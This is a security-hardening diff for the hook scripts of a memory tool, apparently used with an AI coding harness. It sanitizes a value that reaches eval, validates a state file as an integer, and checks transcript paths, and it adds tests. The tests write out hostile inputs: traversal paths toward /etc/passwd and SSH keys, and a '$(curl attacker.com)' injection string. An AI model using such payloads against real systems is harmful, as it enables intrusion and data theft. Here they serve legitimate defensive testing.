diff --git a/hooks/mempal_save_hook.sh b/hooks/mempal_save_hook.sh
index 9eda976..1afeb6e 100755
--- a/hooks/mempal_save_hook.sh
+++ b/hooks/mempal_save_hook.sh
@@ -65,15 +65,18 @@ MEMPAL_DIR=""
 INPUT=$(cat)
 
 # Parse all fields in a single Python call (3x faster than separate invocations)
+# SECURITY: All values are sanitized before being interpolated into shell assignments.
+# stop_hook_active is coerced to a strict True/False to prevent command injection via eval.
 eval $(echo "$INPUT" | python3 -c "
-import sys, json
+import sys, json, re
 data = json.load(sys.stdin)
 sid = data.get('session_id', 'unknown')
-sha = data.get('stop_hook_active', False)
+sha_raw = data.get('stop_hook_active', False)
 tp = data.get('transcript_path', '')
 # Shell-safe output — only allow alphanumeric, underscore, hyphen, slash, dot, tilde
-import re
 safe = lambda s: re.sub(r'[^a-zA-Z0-9_/.\-~]', '', str(s))
+# Coerce stop_hook_active to strict boolean string
+sha = 'True' if sha_raw is True or str(sha_raw).lower() in ('true', '1', 'yes') else 'False'
 print(f'SESSION_ID=\"{safe(sid)}\"')
 print(f'STOP_HOOK_ACTIVE=\"{sha}\"')
 print(f'TRANSCRIPT_PATH=\"{safe(tp)}\"')
@@ -118,7 +121,11 @@ fi
 LAST_SAVE_FILE="$STATE_DIR/${SESSION_ID}_last_save"
 LAST_SAVE=0
 if [ -f "$LAST_SAVE_FILE" ]; then
-    LAST_SAVE=$(cat "$LAST_SAVE_FILE")
+    LAST_SAVE_RAW=$(cat "$LAST_SAVE_FILE")
+    # SECURITY: Validate as plain integer before arithmetic to prevent command injection
+    if [[ "$LAST_SAVE_RAW" =~ ^[0-9]+$ ]]; then
+        LAST_SAVE=$((10#$LAST_SAVE_RAW))  # force base 10 so a value like "08" is not parsed as octal
+    fi
 fi
 
 SINCE_LAST=$((EXCHANGE_COUNT - LAST_SAVE))
diff --git a/mempalace/hooks_cli.py b/mempalace/hooks_cli.py
index 2ce13f4..14fd9f7 100644
--- a/mempalace/hooks_cli.py
+++ b/mempalace/hooks_cli.py
@@ -43,9 +43,41 @@ def _sanitize_session_id(session_id: str) -> str:
     return sanitized or "unknown"
 
 
+def _validate_transcript_path(transcript_path: str) -> "Path | None":
+    """Validate a transcript path and return it in resolved form.
+
+    Returns the expanded, resolved Path when the input is acceptable, or None
+    when it must be rejected. A path is accepted only if it:
+    - is non-empty
+    - has no '..' component in the input as given (checked before resolving,
+      because resolve() collapses those components away)
+    - resolves without error to a name with a .jsonl or .json extension
+
+    This does not confine the path to any particular root directory.
+    """
+    if not transcript_path:
+        return None
+    try:
+        raw = Path(transcript_path)
+        if ".." in raw.parts:
+            return None
+        path = raw.expanduser().resolve()
+    except (OSError, RuntimeError, TypeError, ValueError):
+        # Malformed input (non-path value, embedded NUL, unknown '~user', ...)
+        # must be rejected like any other bad path, not crash the hook
+        return None
+    if path.suffix not in (".jsonl", ".json"):
+        return None
+    return path
+
+
 def _count_human_messages(transcript_path: str) -> int:
     """Count human messages in a JSONL transcript, skipping command-messages."""
-    path = Path(transcript_path).expanduser()
+    path = _validate_transcript_path(transcript_path)
+    if path is None:
+        if transcript_path:
+            _log(f"WARNING: transcript_path rejected by validator: {transcript_path!r}")
+        return 0
     if not path.is_file():
         return 0
     count = 0
diff --git a/tests/test_hooks_cli.py b/tests/test_hooks_cli.py
index 5a1870e..861c054 100644
--- a/tests/test_hooks_cli.py
+++ b/tests/test_hooks_cli.py
@@ -15,6 +15,7 @@ from mempalace.hooks_cli import (
     _maybe_auto_ingest,
     _parse_harness_input,
     _sanitize_session_id,
+    _validate_transcript_path,
     hook_stop,
     hook_session_start,
     hook_precompact,
@@ -418,3 +419,96 @@ def test_run_hook_invalid_json(tmp_path):
         with patch("mempalace.hooks_cli._output") as mock_output:
             run_hook("session-start", "claude-code")
     mock_output.assert_called_once_with({})
+
+
+# --- Security: transcript_path validation ---
+
+
+def test_validate_transcript_rejects_path_traversal():
+    """Paths with '..' components should be rejected."""
+    assert _validate_transcript_path("../../etc/passwd") is None
+    assert _validate_transcript_path("../../../.ssh/id_rsa") is None
+    # Accepted extensions, so only the '..' check can reject these
+    assert _validate_transcript_path("../../etc/passwd.json") is None
+    assert _validate_transcript_path("/tmp/a/../session.jsonl") is None
+
+
+def test_validate_transcript_rejects_wrong_extension():
+    """Only .jsonl and .json extensions are accepted."""
+    assert _validate_transcript_path("/tmp/transcript.txt") is None
+    assert _validate_transcript_path("/tmp/secret.py") is None
+    assert _validate_transcript_path("/home/user/.ssh/id_rsa") is None
+
+
+def test_validate_transcript_accepts_valid_paths(tmp_path):
+    """Valid .jsonl and .json paths should be accepted."""
+    jsonl_path = tmp_path / "session.jsonl"
+    jsonl_path.touch()
+    result = _validate_transcript_path(str(jsonl_path))
+    assert result is not None
+    assert result.suffix == ".jsonl"
+
+    json_path = tmp_path / "session.json"
+    json_path.touch()
+    result = _validate_transcript_path(str(json_path))
+    assert result is not None
+    assert result.suffix == ".json"
+
+
+def test_validate_transcript_empty_string():
+    """Empty transcript path should return None."""
+    assert _validate_transcript_path("") is None
+
+
+def test_count_rejects_traversal_path(tmp_path):
+    """_count_human_messages should return 0 for path traversal attempts."""
+    assert _count_human_messages("../../etc/passwd") == 0
+    # A real, readable transcript reached through '..' must still be rejected
+    (tmp_path / "sub").mkdir()
+    transcript = tmp_path / "t.jsonl"
+    _write_transcript(transcript, [{"message": {"role": "user", "content": "hi"}}])
+    with patch("mempalace.hooks_cli._log"):
+        assert _count_human_messages(str(tmp_path / "sub" / ".." / "t.jsonl")) == 0
+
+
+def test_count_logs_warning_on_rejected_path(tmp_path):
+    """_count_human_messages should log a warning when a non-empty path is rejected."""
+    with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
+        with patch("mempalace.hooks_cli._log") as mock_log:
+            _count_human_messages("../../etc/passwd.jsonl")
+    mock_log.assert_called_once()
+    assert "rejected" in mock_log.call_args[0][0].lower()
+
+
+def test_validate_transcript_accepts_platform_native_path(tmp_path):
+    """Validator accepts platform-native paths (backslashes on Windows, slashes on Unix)."""
+    session_file = tmp_path / "projects" / "abc123" / "session.jsonl"
+    session_file.parent.mkdir(parents=True)
+    session_file.touch()
+    # Use the OS-native string representation (backslashes on Windows)
+    result = _validate_transcript_path(str(session_file))
+    assert result is not None
+    assert result.suffix == ".jsonl"
+    assert result.is_file()
+
+
+def test_stop_hook_rejects_injected_stop_hook_active(tmp_path):
+    """stop_hook_active with shell injection string should not cause issues."""
+    transcript = tmp_path / "t.jsonl"
+    _write_transcript(
+        transcript,
+        [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
+    )
+    # Simulate a malicious stop_hook_active value
+    result = _capture_hook_output(
+        hook_stop,
+        {
+            "session_id": "test",
+            "stop_hook_active": "$(curl attacker.com)",
+            "transcript_path": str(transcript),
+        },
+        state_dir=tmp_path,
+    )
+    # The injected value is not "true"/"1"/"yes", so the hook should NOT pass through
+    # It should count messages and block at the interval
+    assert result["decision"] == "block"